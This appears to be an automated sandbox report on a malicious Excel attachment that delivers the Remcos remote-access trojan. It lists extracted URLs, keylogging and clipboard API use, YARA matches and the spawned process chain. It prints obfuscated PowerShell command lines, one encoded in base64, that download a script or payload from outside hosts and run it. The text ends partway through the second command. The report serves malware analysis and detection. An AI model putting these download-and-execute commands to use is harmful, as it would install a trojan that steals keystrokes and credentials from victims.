                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: powershell.exe, 00000007.00000002.423275187.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.459682593.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.436681548.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000E.00000002.436681548.0000000002622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
                  Source: powershell.exe, 0000000C.00000002.459682593.0000000002753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240
                  Source: powershell.exe, 0000001B.00000002.477143819.0000000001D34000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001AC98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/(c5
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de//r
                  Source: mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/E3
                  Source: mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/inG
                  Source: mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmp, PO_304234.xls, A7130000.0.drString found in binary or memory: https://zhort.de/pitash
                  Source: mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash0
                  Source: mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash4
                  Source: mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash8i
                  Source: mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash;f
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitashta
                  Source: mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitashvWEB
                  Source: mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitashzWEB
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49171 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49174 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49173 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000028_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,28_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,28_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,28_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,28_2_0040A41B
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Excel sheet contains many unusual embedded objects
                  Source: PO_304234.xlsOLE: Microsoft Excel 2007+
                  Source: A7130000.0.drOLE: Microsoft Excel 2007+
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].htaJump to behavior
                  Very long command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9430
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9430
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9430Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9430
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? 